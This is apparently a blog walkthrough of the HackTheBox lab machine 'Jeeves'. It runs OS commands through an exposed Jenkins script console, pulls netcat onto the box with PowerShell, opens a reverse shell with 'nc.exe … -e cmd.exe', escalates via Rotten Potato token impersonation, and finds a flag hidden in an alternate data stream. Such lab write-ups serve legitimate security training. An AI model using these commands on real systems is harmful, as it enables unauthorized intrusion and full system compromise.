Press "Enter" to skip to content

[HackTheBox] Jeeves

I started off with a very quick nmap scan on the target machine.

nmap -sS -sV 10.10.10.63
Nmap scan report for 10.10.10.63
Host is up (0.38s latency).
Not shown: 996 filtered ports
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 10.0
135/tcp   open  msrpc        Microsoft Windows RPC
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open  http         Jetty 9.4.z-SNAPSHOT
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows

I noticed there was an HTTP server on port 80 and 50000. There was nothing vulnerable (at least that I know of) from port 80 BUT after googling Jetty 9.4.z-SNAPSHOT, I noticed there was a handful of vulnerabilities available so I set this as my starting point.

The default page gave an error and there was nothing I could access from here so I decided to run Dirbuster.

After a quick dirbuster scan, it found a directory called /askjeeves/ which was accessible and lead to a Jenkins portal.

After snooping around a bit, I managed to find a console that can launch scripts.

Visiting the page gave me a nice area to run code (and even had examples!)

After searching around a bit on the Jenkins wiki regarding their script console, I came across the following line:

It can even read files in which the Jenkins master has access to on the host (like /etc/passwd)

Because of this, I knew I was close to reaching the first user flag. After doing a bit of googling, I found a few lines of code I could leverage within the console.

This is the main code we will be using to exploit the machine.

def command = "whoami"
def proc = command.execute()
proc.waitForOrKill(1000)
println "Result: ${proc.in.text}"

==

Result: jeeves\kohsuke

A quick explanation for this is:

  1. String variable holding our command.
  2. Execute the command.
  3. Wait for or Kill process after 1000 milliseconds.
  4. Print out the result from the command (if there was any generated).

Using this, I tried to start off by listing all the contents of the current directory:

def command = "dir"
==
Result: java.io.IOException: CreateProcess error=2, The system cannot find the file specified

This was interesting because I could run “whoami” just fine but I could not run “dir”. This led me to trying to see if I could run cmd.exe and/or powershell.exe. I found out that PowerShell DOES exist but it was glitchy and would hang for some reason (I never found out why). I did find ways around the “glitchyness” to execute PowerShell commands and we will see later on how that helps.

def command = "cmd"
--
Result: Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.
    
C:\Users\Administrator\.jenkins>

Nice! We can run commands to get inside of CMD. One thing to note here is that this isn’t a persistent shell (its just the result text from running the cmd command!)

Anyways, this was more than enough to let me navigate to the user directory and obtain the user flag (user.txt).

def command = "cmd /k cd C:\\Users\\kohsuke\\Desktop & more user.txt"      
==
Result: e3--------------------------66a

Obviously, trying to get root privileges by constantly sending commands was not feasible and therefore I needed a simple way to navigate around the system. I grabbed NC for Windows from the following link: https://joncraton.org/blog/46/netcat-for-windows/. Since you can’t connect to the outside-internet on a box, I hosted a server on my local computer using Python’s SimpleHTTPServer.

python -m SimpleHTTPServer 8989
Serving HTTP on 0.0.0.0 port 8989 ...

Now I needed a way to transfer the file from my local computer to the box.
Command Prompt (Windows 7 version on the box at the time of article) does not have a way for us to download a file BUT PowerShell does have a few methods to download files.

def command = "cmd.exe /k cd C:\\Users\\kohsuke\\Music && PowerShell.exe -Command Invoke-WebRequest -OutFile nc.exe http://10.10.15.24:9000/nc.exe"
println "Result: ${proc.in.text}"

There are a couple things to take away from the script above. First notice that the “waitForOrKill” has been removed. Depending on speed of your internet connection, it is possible that the transfer will be killed before the file transfer is complete. You could’ve also increased the value from 1000 to a higher value but for simplicity’s sake I removed it.

Anyways, I thought I would quickly explain the first line.

  1. Create cmd.exe.
    /k tells cmd to run the following commands and then return to the command prompt.
    /c option can also be used which tells the command prompt to terminate after the commands have run.
    (For the purpose of this box, it does not matter which one we use).
  2. Navigate to C:\Users\kohsuke\Music (I went to a random folder to hide the NetCat file to let others figure this part out themselves instead of having NetCat provided to them the easy way!)
  3. To run multiple commands, I used an && after each command. A single ampersand (&) is used to separate multiple commands on one command line. A double ampersand (&&) is used to run commands ONLY if the command preceding it was successful. Basically, I wanted to start the next line only if I was inside of my selected folder.
  4. PowerShell.exe launches PowerShell via CMD. -Command means run the following command. Invoke-WebRequest gets content from the internet. -OutFile is the file we will be creating, in my case “nc.exe”. “http://10.10.15.24:9000/nc.exe” is the address assigned from HackTheBox to my Kali VM on port 9000 where my SimpleHTTPServer is hosting the NetCat file.

I can observe the download progress by looking at the terminal where I created my server.

10.10.15.24 - - [18/May/2018 02:49:32] "GET / HTTP/1.1" 200 -
10.10.10.63 - - [18/May/2018 02:58:07] "GET /nc.exe HTTP/1.1" 200 -

I can also observe that the file has been downloaded by running the dir command from the command prompt.

 def command = "cmd.exe /k cd C:\\Users\\kohsuke\\Music & dir"
 -- 
 Result:  Volume in drive C has no label.
 Volume Serial Number is BE50-B1C9

 Directory of C:\Users\kohsuke\Music

05/17/2018  05:58 PM    <DIR>          .
05/17/2018  05:58 PM    <DIR>          ..
05/17/2018  05:58 PM            61,440 nc.exe
               1 File(s)         61,440 bytes
               2 Dir(s)   7,191,183,360 bytes free

The only thing left is to connect to the terminal on my Kali VM.

As per usual, listen on a selected port using:

nc -nvlp 8989

On the target computer, I ran the following line to create a reverse-shell with a command prompt:

def command = "cmd.exe /k cd C:\\Users\\kohsuke\\Music & nc.exe 10.10.15.24 8989 -e cmd.exe"

Note: I tried to return a shell with PowerShell but it doesn’t work (not sure if it was intended or I just have bad connection).

After running the command above, I can see a connection to the shell on my Kali VM.

root@kali:~/Desktop/HackTheBox/windows# nc -nvlp 8989
listening on [any] 8989 ...
connect to [10.10.15.24] from (UNKNOWN) [10.10.10.63] 49706
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.

C:\Users\kohsuke\Music>

The first thing I wanted to do was enumerate everything I could find about our system and current user.

C:\Users\kohsuke\Music>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
...

As you can see above, I have access to a privilege that would allow me to impersonate a client. There is a very famous exploit that works for this known as “Rotten Potato.”

There are multiple ways to run this exploit but the simplest one is to run it from a Meterpreter (I was also being lazy but since we already uploaded netcat to the target I decided to just go with it. Usually, I try not to use Metasploit at all).

Anyways, I pretty much just followed everything from the article:

meterpreter > upload /root/Desktop/HackTheBox/windows/potato.exe
[*] uploading  : /root/Desktop/HackTheBox/windows/potato.exe -> potato.exe
[*] Uploaded 664.00 KiB of 664.00 KiB (100.0%): /root/Desktop/HackTheBox/windows/potato.exe -> potato.exe
[*] uploaded   : /root/Desktop/HackTheBox/windows/potato.exe -> potato.exe
meterpreter > use incognito
Loading extension incognito...Success.

Initially, when I list the tokens you can see that there are no available tokens.

meterpreter > list_tokens -u
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
JEEVES\kohsuke

Impersonation Tokens Available
========================================
No tokens available

However; when I run Rotten Potato, an administrator level token becomes available.

meterpreter > execute -Hc -f ./potato.exe
Process 3932 created.
Channel 2 created.
meterpreter > list_tokens -u
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
JEEVES\kohsuke

Impersonation Tokens Available
========================================
NT AUTHORITY\SYSTEM

Now all we need to do is impersonate the token to get administrator-level access.

meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM"
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM
[-] No delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM

After this, I successfully navigated to the root folder but came across another dead end.

meterpreter > ls
Listing: C:\Users\Administrator\Desktop
=======================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  797   fil   2017-11-09 01:05:18 +1100  Windows 10 Update Assistant.lnk
100666/rw-rw-rw-  282   fil   2017-11-04 13:03:17 +1100  desktop.ini
100444/r--r--r--  36    fil   2017-12-24 18:51:10 +1100  hm.txt

meterpreter > cat hm.txt
The flag is elsewhere.  Look deeper.

The flag wasn’t there. I upgraded my session to a shell and decided to have a look around.
I did get stuck here for quite a while but after googling around a bit, I came across the following article: How to Hide Data in a Secret Text File Compartment. After researching abit, I came across the /R flag for the dir command which showed me the hidden root file!

C:\Users\Administrator\Desktop>dir /R
 Volume in drive C has no label.
 Volume Serial Number is BE50-B1C9

 Directory of C:\Users\Administrator\Desktop

11/08/2017  10:05 AM    <DIR>          .
11/08/2017  10:05 AM    <DIR>          ..
12/24/2017  03:51 AM                36 hm.txt
                                    34 hm.txt:root.txt:$DATA
11/08/2017  10:05 AM               797 Windows 10 Update Assistant.lnk
               2 File(s)            833 bytes
               2 Dir(s)   7,135,608,832 bytes free

The only thing left was to open the root.txt file and obtain the flag!

C:\Users\Administrator\Desktop>more < hm.txt:root.txt:$DATA
af----------------------------30

Overall, it was a pretty fun box. I’ve primarily worked on Linux boxes so this was a good opportunity to learn many things about the Windows system 🙂

Be First to Comment

Leave a Reply

Your email address will not be published. Required fields are marked *